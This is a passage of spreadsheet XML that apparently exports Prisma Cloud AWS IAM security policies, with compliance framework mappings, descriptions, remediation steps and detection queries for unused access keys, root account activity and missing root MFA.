          <t>MITRE ATT&amp;CK v10.0 [Deprecated], GDPR, APRA (CPS 234) Information Security, wells fargo CIS v1.5.0 (AWS) - Level 1, Cybersecurity Maturity Model Certification (CMMC) v.1.02, NYDFS 23 CRR-NY 500.0, NIST SP 800-172, NIST SP 800-171 Revision 2, MITRE ATT&amp;CK v6.3 [Deprecated], Matt's ATT&amp;ACK, jbrox - GDPR, CIS v1.4.0 (AWS), APRA (CPS 234) Information Security, MLPS 2.0 (Level 2), NIST CSF, Fedramp (Moderate), MITRE ATT&amp;CK v6.3 [Deprecated], MAS TRM 2021, ACSC Information Security Manual (ISM), MITRE ATT&amp;CK v6.3 [Deprecated], MITRE ATT&amp;CK v12, PCI DSS v4.0, kashan ACSC Information Security Manual (ISM), MITRE ATT&amp;CK v12, jneytchev-fedramp-low, CIS v1.5.0 (AWS) - Level 1, Fedramp (Low), CSA CCM v3.0.1, CIS Controls v7.1, MITRE ATT&amp;CK v8.2 [Deprecated], CHC HITRUST CSF v.9.6.0, NIST 800-171 Rev1, MITRE ATT&amp;CK v12, PCI DSS v3.2.1, MITRE ATT&amp;CK v6.3 [Deprecated], CIS v1.3.0 (AWS), MITRE ATT&amp;CK v12, NIST 800-53 Rev4, MAS TRM 2021, SOC 2, CDC NIST 800-53 Rev4, CSA CCM v3.0.1, MITRE ATT&amp;CK v8.2 [Deprecated], MITRE ATT&amp;CK v6.3 [Deprecated], APRA (CPS 234) Information Security, NIST CSF, SOC 2, CIS Controls v8, AWS Well-Architected Framework, Matt's ATT&amp;ACK, HITRUST v.9.4.2 [Deprecated], HITRUST CSF v9.3 [Deprecated], Secure Controls Framework (SCF) - 2022.2.1, Copy of ACSC Information Security Manual (ISM)-clone, CSA CCM v.4.0.6, MAS TRM 2021, HITRUST CSF v.9.6.0, Copy of CIS Controls v8, MTSBv2_AWS, kfirdaus AWS Account-CS, Brazilian Data Protection Law (LGPD), Sarbanes Oxley Act (SOX), Matt's ATT&amp;ACK, MITRE ATT&amp;CK v6.3 [Deprecated], NIST SP 800-172, Matt's ATT&amp;ACK, NIST 800-53 Rev 5, HITRUST CSF v9.3 [Deprecated]</t>
        </is>
      </c>
      <c r="B1942" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1942" s="2" t="inlineStr"/>
      <c r="D1942" t="inlineStr"/>
      <c r="E1942" t="inlineStr"/>
      <c r="F1942" t="inlineStr"/>
      <c r="G1942" t="b">
        <v>0</v>
      </c>
      <c r="H19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2" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1942" t="inlineStr">
        <is>
          <t>aws-iam</t>
        </is>
      </c>
      <c r="K1942" t="inlineStr">
        <is>
          <t>tadenugba Copy of AWS access keys not used for more than 45 days</t>
        </is>
      </c>
      <c r="L1942" t="inlineStr">
        <is>
          <t>KEYS_AND_SECRETS</t>
        </is>
      </c>
      <c r="M1942" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N1942" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O1942" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1942" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1942" t="inlineStr">
        <is>
          <t>Control Category: 06.0</t>
        </is>
      </c>
      <c r="R1942" t="inlineStr">
        <is>
          <t>Control Reference:06.d</t>
        </is>
      </c>
      <c r="S1942" t="inlineStr">
        <is>
          <t>tadenugba_label</t>
        </is>
      </c>
      <c r="T1942" t="b">
        <v>0</v>
      </c>
      <c r="U1942" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1942" t="inlineStr">
        <is>
          <t>aws-iam-get-credential-report</t>
        </is>
      </c>
      <c r="W1942" t="inlineStr">
        <is>
          <t>This policy identifies IAM users for which access keys are not used for more than 45 days. Access keys allow users programmatic access to resources. However, if any access key has not been used in the past 45 days, then that access key needs to be deleted (even though the access key is inactive)</t>
        </is>
      </c>
      <c r="X1942" t="inlineStr">
        <is>
          <t>To delete the reported AWS User access key follow below mentioned URL:
https://aws.amazon.com/premiumsupport/knowledge-center/delete-access-key/</t>
        </is>
      </c>
      <c r="Y1942" t="inlineStr"/>
      <c r="Z1942" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type ='aws' and api.name = 'aws-iam-get-credential-report' AND json.rule = '(access_key_1_active is true and ((access_key_1_last_used_date != N/A and _DateTime.ageInDays(access_key_1_last_used_date) &gt; 45) or (access_key_1_last_used_date == N/A and access_key_1_last_rotated != N/A and _DateTime.ageInDays(access_key_1_last_rotated) &gt; 45))) or (access_key_2_active is true and ((access_key_2_last_used_date != N/A and _DateTime.ageInDays(access_key_2_last_used_date) &gt; 45) or (access_key_2_last_used_date == N/A and access_key_2_last_rotated != N/A and _DateTime.ageInDays(access_key_2_last_rotated) &gt; 45)))'</t>
        </is>
      </c>
      <c r="AA1942" t="inlineStr">
        <is>
          <t>Tunde Adenugba</t>
        </is>
      </c>
      <c r="AB1942" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1942" t="inlineStr"/>
      <c r="AD1942" t="b">
        <v>0</v>
      </c>
      <c r="AE1942" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF1942" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG19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2" t="inlineStr">
        <is>
          <t>5c236d9c-1bea-4242-a84f-47836620f0f9</t>
        </is>
      </c>
      <c r="AI1942" t="inlineStr">
        <is>
          <t>b9fae768-20c9-45a1-b519-7dfb2e7ee22e</t>
        </is>
      </c>
      <c r="AJ1942" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1942" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1943">
      <c r="A1943" t="inlineStr">
        <is>
          <t>Australian Cyber Security Centre (ACSC) Essential Eight</t>
        </is>
      </c>
      <c r="B1943" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1943" s="2" t="inlineStr"/>
      <c r="D1943" t="inlineStr"/>
      <c r="E1943" t="inlineStr"/>
      <c r="F1943" t="inlineStr"/>
      <c r="G1943" t="b">
        <v>0</v>
      </c>
      <c r="H19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3" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1943" t="inlineStr">
        <is>
          <t>aws-iam</t>
        </is>
      </c>
      <c r="K1943" t="inlineStr">
        <is>
          <t>kfirdaus AWS Account</t>
        </is>
      </c>
      <c r="L1943" t="inlineStr"/>
      <c r="M1943" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1943" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O1943" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1943" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1943" t="inlineStr">
        <is>
          <t>Mitigation Strategies to Prevent Malware Delivery and Execution</t>
        </is>
      </c>
      <c r="R1943" t="inlineStr">
        <is>
          <t>Application control</t>
        </is>
      </c>
      <c r="S1943" t="inlineStr"/>
      <c r="T1943" t="b">
        <v>0</v>
      </c>
      <c r="U1943" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1943" t="inlineStr">
        <is>
          <t>aws-iam-get-credential-report</t>
        </is>
      </c>
      <c r="W1943" t="inlineStr"/>
      <c r="X1943" t="inlineStr"/>
      <c r="Y1943" t="inlineStr"/>
      <c r="Z1943" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND cloud.service = 'IAM' and cloud.account = 'AWS Account2' AND api.name = 'aws-iam-get-credential-report' AND json.rule = 'user equals "&lt;root_account&gt;" and mfa_active is false and arn does not contain gov:'</t>
        </is>
      </c>
      <c r="AA1943" t="inlineStr">
        <is>
          <t>Marius Banica</t>
        </is>
      </c>
      <c r="AB1943" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1943" t="inlineStr"/>
      <c r="AD1943" t="b">
        <v>0</v>
      </c>
      <c r="AE1943" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF1943" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG19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3" t="inlineStr">
        <is>
          <t>286ba6c6-1af5-471d-b7b7-08b16bac1ffe</t>
        </is>
      </c>
      <c r="AI1943" t="inlineStr">
        <is>
          <t>14217e7e-6881-457b-ada0-91309b0575ba</t>
        </is>
      </c>
      <c r="AJ1943" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1943" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1944">
      <c r="A1944" t="inlineStr">
        <is>
          <t>Microsoft Cloud Security Benchmark v1, TX-RAMP Level 2, Insurance Regulatory And Development Authority Of India, Secure Controls Framework (SCF) - 2024.2, CIS Controls v8, SOC 2, Australian Cyber Security Centre (ACSC) Essential Eight - Level 3, Australian Cyber Security Centre (ACSC) Essential Eight - Level 2, HITRUST CSF v.11.2.0, ISO/IEC 27001:2022, TX-RAMP Level 1, CIS v2.0.0 (AWS) - Level 1, ITSG-33, TX-RAMP Level 2, CSA CCM v4.0.12, CIS Controls v7.1, CIS v3.0.0 (AWS) Level 1</t>
        </is>
      </c>
      <c r="B1944" s="2" t="inlineStr">
        <is>
          <t>REVIEW</t>
        </is>
      </c>
      <c r="C1944" s="2" t="inlineStr"/>
      <c r="D1944" t="n">
        <v>0</v>
      </c>
      <c r="E1944" t="n">
        <v>0</v>
      </c>
      <c r="F1944" t="n">
        <v>5</v>
      </c>
      <c r="G1944" t="b">
        <v>1</v>
      </c>
      <c r="H19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4" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1944" t="inlineStr">
        <is>
          <t>aws-iam</t>
        </is>
      </c>
      <c r="K1944" t="inlineStr">
        <is>
          <t>AWS root account activity detected in last 14 days</t>
        </is>
      </c>
      <c r="L1944" t="inlineStr">
        <is>
          <t>HIGH_PRIVILEGED_ROLE</t>
        </is>
      </c>
      <c r="M1944" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1944" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1944" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1944" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1944" t="inlineStr">
        <is>
          <t>Identity and Access Management</t>
        </is>
      </c>
      <c r="R1944" t="inlineStr">
        <is>
          <t>1.7</t>
        </is>
      </c>
      <c r="S1944" t="inlineStr"/>
      <c r="T1944" t="b">
        <v>0</v>
      </c>
      <c r="U1944" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1944" t="inlineStr">
        <is>
          <t>aws-iam-get-credential-report</t>
        </is>
      </c>
      <c r="W1944" t="inlineStr">
        <is>
          <t>This policy identifies if AWS root account activity was detected within the last 14 days.
The AWS root account user is the primary administrative identity associated with an AWS account, providing complete access to all AWS services and resources. Since the root user has complete access to the account, adopting the principle of least privilege is important to lower the risk of unintentional disclosure of highly privileged credentials and inadvertent alterations. It's also advised to remove the root user access keys and restrict the use of the root user, refraining from using them for routine or administrative duties.
It is recommended to restrict the use of the AWS root account.</t>
        </is>
      </c>
      <c r="X1944" t="inlineStr">
        <is>
          <t>If any access keys are created for the root account, please delete the keys using the following steps:
1. Sign in to AWS Console as the root user.
2. Click the root account name and on the top right select  'Security Credentials' from the dropdown.
3. For each key in 'Access Keys', click on 'X' to delete the keys.
Limiting root user console access as much as feasible is advised.</t>
        </is>
      </c>
      <c r="Y1944" t="inlineStr"/>
      <c r="Z1944" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-iam-get-credential-report' AND json.rule = 'user equals "&lt;root_account&gt;" and ( _DateTime.ageInDays(access_key_1_last_used_date) &lt; 14 or _DateTime.ageInDays(access_key_2_last_used_date) &lt; 14 or _DateTime.ageInDays(password_last_used) &lt; 14 )'</t>
        </is>
      </c>
      <c r="AA1944" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1944" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1944" t="inlineStr">
        <is>
          <t>PC-AWS-IAM-1111</t>
        </is>
      </c>
      <c r="AD1944" t="b">
        <v>1</v>
      </c>
      <c r="AE1944" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1944" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG19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4" t="inlineStr">
        <is>
          <t>15ef22b5-4eff-4377-ae32-02eaab62d0eb</t>
        </is>
      </c>
      <c r="AI1944" t="inlineStr">
        <is>
          <t>17a1b782-3a39-4b6a-bd14-a10b74c7b795</t>
        </is>
      </c>
      <c r="AJ1944" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1944" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1945">
      <c r="A1945" t="inlineStr">
        <is>
          <t>ISO 27001:2013, NIST 800-53 Rev4, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, Demo_Daryl ACSC Information Security Manual (ISM), GDPR, APRA (CPS 234) Information Security, APRA (CPS 234) Information Security, ISO 27002:2022, RBI Baseline Cyber Security and Resilience Requirements, HIPAA, Australian Cyber Security Centre (ACSC) Essential Eight - Level 2, Matt's ATT&amp;ACK, TX-RAMP Level 2, CSA CCM v3.0.1, Secure Controls Framework (SCF) - 2024.2, Demo_Daryl ACSC Information Security Manual (ISM), APRA (CPS 234) Information Security, NIST 800-53 Rev4, CDC NIST 800-53 Rev4, NIST 800-53 Rev 5, Demo_Daryl ACSC Information Security Manual (ISM), Microsoft Cloud Security Benchmark v1, MLPS 2.0 (Level 3), kfirdaus AWS Account-CS, NIST 800-53 Rev4, MITRE ATT&amp;CK v6.3 [Deprecated], ISO/IEC 27002:2013, NIST CSF v2.0, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), CHC HITRUST CSF v.9.6.0, jbrox - GDPR, ACSC Information Security Manual (ISM), CIS v1.5.0 (AWS) - Level 1, NIST CSF, NIST 800-53 Rev4, APRA (CPS 234) Information Security, Australian Cyber Security Centre (ACSC) Essential Eight - Level 1, CSA CCM v3.0.1, Korea – Information Security Management System (ISMS), TX-RAMP Level 1, Fedramp (Moderate), ISO/IEC 27002:2013, CDC NIST 800-53 Rev4, TX-RAMP Level 1, CSA CCM v4.0.12, CDC NIST 800-53 Rev4, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), ISO/IEC 27002:2013, CDC NIST 800-53 Rev4, Australian Cyber Security Centre (ACSC) Essential Eight - Level 3, MITRE ATT&amp;CK v6.3 [Deprecated], Korea – Information Security Management System (ISMS), MTSBv2_AWS, CSA CCM v3.0.1, MITRE ATT&amp;CK v6.3 [Deprecated], Fedramp (Moderate), Fedramp (Low), CDC NIST 800-53 Rev4, NIST 800-53 Rev4, Korea – Information Security Management System (ISMS), Copy of ACSC Information Security Manual (ISM)-clone, SOC 2, NIST SP 800-171 Revision 2, ISO/IEC 27018:2019, CyberSecurity Law of the People's Republic of China, HITRUST CSF v.11.2.0, CSA CCM v.4.0.1, Demo_Daryl ACSC Information Security Manual (ISM), PCI DSS v3.2.1, Copy of ACSC Information Security Manual (ISM)-clone, CIS v1.3.0 (AWS), CRI Profile v2.0, wells fargo CIS v1.5.0 (AWS) - Level 1, NIST 800-53 Rev 5, CIS v1.4.0 (AWS), SOC 2, ISO/IEC 27017:2015, ISO/IEC 27001:2022, NIST 800-53 Rev 5, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), Fedramp (Moderate), Cybersecurity Maturity Model Certification (CMMC) v.1.02, MAS TRM 2021, Copy of CIS Controls v8, MITRE ATT&amp;CK v8.2 [Deprecated], Telecommunications Security Act - TSA, Sarbanes Oxley Act (SOX), MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v12, Sarbanes Oxley Act (SOX), kashan ACSC Information Security Manual (ISM), NYDFS 23 CRR-NY 500.0, CDC NIST 800-53 Rev4, Secure Controls Framework (SCF) - 2022.2.1, MLPS 2.0, TX-RAMP Level 2, CRI Profile v1.2.1, Risk Management in Technology (RMiT), TX-RAMP Level 2, NIST SP 800-171 Revision 3, Australian Energy Sector Cyber Security Framework (AESCSF), HITRUST CSF v.9.6.0, MITRE ATT&amp;CK v6.3 [Deprecated], ISO 27001:2013, MLPS 2.0 (Level 2), CIS Controls v7.1, CRI Profile v2.0, ISO/IEC 27002:2013, CIS Controls v8, CSA CCM v.4.0.6, CHC HITRUST CSF v.9.6.0, HITRUST CSF v9.3 [Deprecated], MITRE ATT&amp;CK v10.0 [Deprecated], Korea – Information Security Management System (ISMS), Telecommunications Security Act - TSA, CSA CCM v4.0.12, SOC 2, NYDFS 23 CRR-NY 500.0, ISO/IEC 27017:2015, CSA CCM v.4.0.1, jneytchev-fedramp-low, NIST 800-171 Rev1, CIS v1.2.0 (AWS), Australian Cyber Security Centre (ACSC) Essential Eight, APRA (CPS 234) Information Security, Australian Cyber Security Centre (ACSC) Essential Eight - Level 2, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, PCI DSS v4.0, HIPAA, MITRE ATT&amp;CK v8.2 [Deprecated], CSA CCM v.4.0.6, MITRE ATT&amp;CK v6.3 [Deprecated], APRA (CPS 234) Information Security, ISO/IEC 27002:2013, CSA CCM v.4.0.1, AWS Well-Architected Framework, HITRUST CSF v.9.6.0, CSA CCM v3.0.1, ISO/IEC 27001:2022, HITRUST CSF v.11.2.0, CIS Controls v8.1, ISO/IEC 27018:2019, Fedramp (Moderate), ISO/IEC 27001:2022, SOC 2, NIST 800-53 Rev4, CSA CCM v.4.0.1, NYDFS 23 CRR-NY 500.0, CDC NIST 800-53 Rev4, CSA CCM v4.0.12, ISO/IEC 27002:2013, CSA CCM v4.0.12, NIST SP 800-172, CSA CCM v3.0.1, PCI DSS v4.0, APRA (CPS 234) Information Security, CCPA 2018, ITSG-33, PIPEDA, CIS v2.0.0 (AWS) - Level 1, CSA CCM v4.0.12, Demo_Daryl ACSC Information Security Manual (ISM), Australian Cyber Security Centre (ACSC) Essential Eight - Level 3, CSA CCM v.4.0.1, Brazilian Data Protection Law (LGPD), CIS v3.0.0 (AWS) Level 1, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, ISO/IEC 27002:2013, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), NIST 800-53 Rev4, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), MLPS 2.0 (Level 2), MITRE ATT&amp;CK v6.3 [Deprecated], FFIEC, kfirdaus AWS Account-CS, Demo_Daryl ACSC Information Security Manual (ISM), ACSC Information Security Manual (ISM), Microsoft Cloud Security Benchmark v1, kashan ACSC Information Security Manual (ISM)</t>
        </is>
      </c>
      <c r="B1945" s="2" t="inlineStr">
        <is>
          <t>REVIEW</t>
        </is>
      </c>
      <c r="C1945" s="2" t="inlineStr"/>
      <c r="D1945" t="n">
        <v>0</v>
      </c>
      <c r="E1945" t="n">
        <v>17</v>
      </c>
      <c r="F1945" t="n">
        <v>43</v>
      </c>
      <c r="G1945" t="b">
        <v>1</v>
      </c>
      <c r="H19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5" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1945" t="inlineStr">
        <is>
          <t>aws-iam</t>
        </is>
      </c>
      <c r="K1945" t="inlineStr">
        <is>
          <t>AWS MFA is not enabled on Root account</t>
        </is>
      </c>
      <c r="L1945" t="inlineStr">
        <is>
          <t>MFA</t>
        </is>
      </c>
      <c r="M1945" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1945" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1945" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1945" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1945" t="inlineStr">
        <is>
          <t>Guidelines for System Hardening</t>
        </is>
      </c>
      <c r="R1945" t="inlineStr">
        <is>
          <t>ISM-1173</t>
        </is>
      </c>
      <c r="S1945" t="inlineStr">
        <is>
          <t>Boehringer tag,Identity Misconfiguration,Policy Status Review,Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1945" t="b">
        <v>0</v>
      </c>
      <c r="U1945" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1945" t="inlineStr">
        <is>
          <t>aws-iam-get-credential-report</t>
        </is>
      </c>
      <c r="W1945" t="inlineStr">
        <is>
          <t>This policy identifies root account which has MFA enabled. Root accounts have privileged access to all AWS services. Without MFA, if the root credentials are compromised, unauthorized users will get full access to your account.
NOTE: This policy does not apply to AWS GovCloud Accounts. As you cannot enable an MFA device for AWS GovCloud (US) account root user. For more details refer: https://docs.aws.amazon.com/govcloud-us/latest/UserGuide/govcloud-console.html</t>
        </is>
      </c>
      <c r="X1945" t="inlineStr">
        <is>
          <t>1. Sign in to the 'AWS Console' using Root credentials.
2. Navigate to the 'IAM' service.
3. On the dashboard, click on 'Activate MFA on your root account', click on 'Manage MFA' and follow the steps to configure MFA for the root account.</t>
        </is>
      </c>
      <c r="Y1945" t="inlineStr"/>
      <c r="Z1945" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-iam-get-credential-report' AND json.rule = 'user equals "&lt;root_account&gt;" and mfa_active is false and arn does not contain gov:'</t>
        </is>
      </c>
      <c r="AA1945" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1945" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1945" t="inlineStr">
        <is>
          <t>PC-AWS-IAM-8</t>
        </is>
      </c>
      <c r="AD1945" t="b">
        <v>1</v>
      </c>
      <c r="AE1945" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1945" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG19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5" t="inlineStr">
        <is>
          <t>478434a1-ff6c-492e-b411-c427c06291d9</t>
        </is>
      </c>
      <c r="AI1945" t="inlineStr">
        <is>
          <t>478434a1-ff6c-492e-b411-c427c06291d9</t>
        </is>
      </c>
      <c r="AJ1945" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1945" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1946">
      <c r="A1946" t="inlineStr">
        <is>
          <t>MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, GDPR, APRA (CPS 234) Information Security, HITRUST CSF v.11.2.0, MITRE ATT&amp;CK v12, HIPAA, Australian Cyber Security Centre (ACSC) Essential Eight - Level 2, PCI DSS v4.0, Cybersecurity Maturity Model Certification (CMMC) v.1.02, NYDFS 23 CRR-NY 500.0, CIS Controls v8, CIS v3.0.0 (AWS) Level 1, CSA CCM v4.0.12, MITRE ATT&amp;CK v6.3 [Deprecated], CIS v1.5.0 (AWS) - Level 1, jbrox - GDPR, Copy of CIS Controls v8, APRA (CPS 234) Information Security, CSA CCM v.4.0.6, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), TX-RAMP Level 1, PCI DSS v4.0, NIST CSF, Microsoft Cloud Security Benchmark v1, Fedramp (Moderate), NIST SP 800-172, Telecommunications Security Act - TSA, MITRE ATT&amp;CK v6.3 [Deprecated], MLPS 2.0, HITRUST CSF v.11.2.0, NIST SP 800-171 Revision 3, ACSC Information Security Manual (ISM), MITRE ATT&amp;CK v6.3 [Deprecated], Matt's ATT&amp;ACK, Secure Controls Framework (SCF) - 2022.2.1, Australian Cyber Security Centre (ACSC) Essential Eight - Level 3, MITRE ATT&amp;CK v8.2 [Deprecated], CIS v2.0.0 (AWS) - Level 1, TX-RAMP Level 2, ITSG-33, CIS v1.4.0 (AWS), CSA CCM v.4.0.6, kashan ACSC Information Security Manual (ISM), FFIEC, CyberSecurity Law of the People's Republic of China, Australian Cyber Security Centre (ACSC) Essential Eight - Level 1, MTSBv2_AWS, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, Insurance Regulatory And Development Authority Of India, jneytchev-fedramp-low, Fedramp (Low), Australian Energy Sector Cyber Security Framework (AESCSF), CSA CCM v3.0.1, Secure Controls Framework (SCF) - 2024.2, NIST SP 800-171 Revision 2, MITRE ATT&amp;CK v10.0 [Deprecated], MAS TRM 2021, CSA CCM v.4.0.6, RBI Baseline Cyber Security and Resilience Requirements, Sarbanes Oxley Act (SOX), DORA, Sarbanes Oxley Act (SOX), NIST 800-171 Rev1, PCI DSS v3.2.1, PCI DSS v4.0, TX-RAMP Level 2, Risk Management in Technology (RMiT), MITRE ATT&amp;CK v6.3 [Deprecated], MLPS 2.0 (Level 2), MITRE ATT&amp;CK v8.2 [Deprecated], CIS v1.3.0 (AWS), NIST 800-53 Rev4, NYDFS 23 CRR-NY 500.0, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), CRI Profile v2.0, SOC 2, Australian Cyber Security Centre (ACSC) Essential Eight, CDC NIST 800-53 Rev4, CSA CCM v3.0.1, Secure Controls Framework (SCF) - 2024.2, MITRE ATT&amp;CK v6.3 [Deprecated], APRA (CPS 234) Information Security, NIST CSF, SOC 2, PCI DSS v4.0, NIST SP 800-171 Revision 3, NIST CSF v2.0, AWS Well-Architected Framework, SOC 2, HITRUST v.9.4.2 [Deprecated], HITRUST CSF v9.3 [Deprecated], ISO/IEC 27001:2022, Copy of ACSC Information Security Manual (ISM)-clone, HITRUST CSF v.9.6.0, CIS Controls v8.1, MLPS 2.0 (Level 3), MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, CSA CCM v4.0.12, wells fargo CIS v1.5.0 (AWS) - Level 1, CCPA 2018, ITSG-33, PIPEDA, kfirdaus AWS Account-CS, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), Brazilian Data Protection Law (LGPD), CIS Controls v7.1, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), CHC HITRUST CSF v.9.6.0, MITRE ATT&amp;CK v6.3 [Deprecated], ISO 27002:2022, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, NIST 800-53 Rev 5, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, PCI DSS v3.2.1, Australian Cyber Security Centre (ACSC) Essential Eight</t>
        </is>
      </c>
      <c r="B1946" s="2" t="inlineStr">
        <is>
          <t>REVIEW</t>
        </is>
      </c>
      <c r="C1946" s="2" t="inlineStr"/>
      <c r="D1946" t="n">
        <v>0</v>
      </c>
      <c r="E1946" t="n">
        <v>0</v>
      </c>
      <c r="F1946" t="n">
        <v>8</v>
      </c>
      <c r="G1946" t="b">
        <v>1</v>
      </c>
      <c r="H19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6" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1946" t="inlineStr">
        <is>
          <t>aws-iam</t>
        </is>
      </c>
      <c r="K1946" t="inlineStr">
        <is>
          <t>AWS IAM user has two active Access Keys</t>
        </is>
      </c>
      <c r="L1946" t="inlineStr">
        <is>
          <t>KEYS_AND_SECRETS</t>
        </is>
      </c>
      <c r="M1946" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N1946" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1946" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1946" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1946" t="inlineStr">
        <is>
          <t>Control Category: 01.0</t>
        </is>
      </c>
      <c r="R1946" t="inlineStr">
        <is>
          <t>01.c</t>
        </is>
      </c>
      <c r="S1946" t="inlineStr">
        <is>
          <t>Identity Misconfiguration,Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1946" t="b">
        <v>0</v>
      </c>
      <c r="U1946" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1946" t="inlineStr">
        <is>
          <t>aws-iam-get-credential-report</t>
        </is>
      </c>
      <c r="W1946" t="inlineStr">
        <is>
          <t>This policy identifies IAM users who have two active Access Keys. Each IAM user can have up to two Access Keys, having two Keys instead of one can lead to increased chances of accidental exposure. So it needs to be ensured that unused Access Keys are deleted.</t>
        </is>
      </c>
      <c r="X1946" t="inlineStr">
        <is>
          <t>1. Sign in to the AWS Console and navigate to the 'IAM' service.
2. Click on Users in the navigation pane.
3. For the identified IAM user which has two active Access Keys, based on policies of your company, take appropriate action.
4. Create another IAM user with the specific objective performed by the 2nd Access Key.
5. Delete one of the unused Access Keys.</t>
        </is>
      </c>
      <c r="Y1946" t="inlineStr"/>
      <c r="Z1946" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' and api.name = 'aws-iam-get-credential-report' AND json.rule = 'access_key_1_active is true and access_key_2_active is true'</t>
        </is>
      </c>
      <c r="AA1946" t="inlineStr">
        <is>
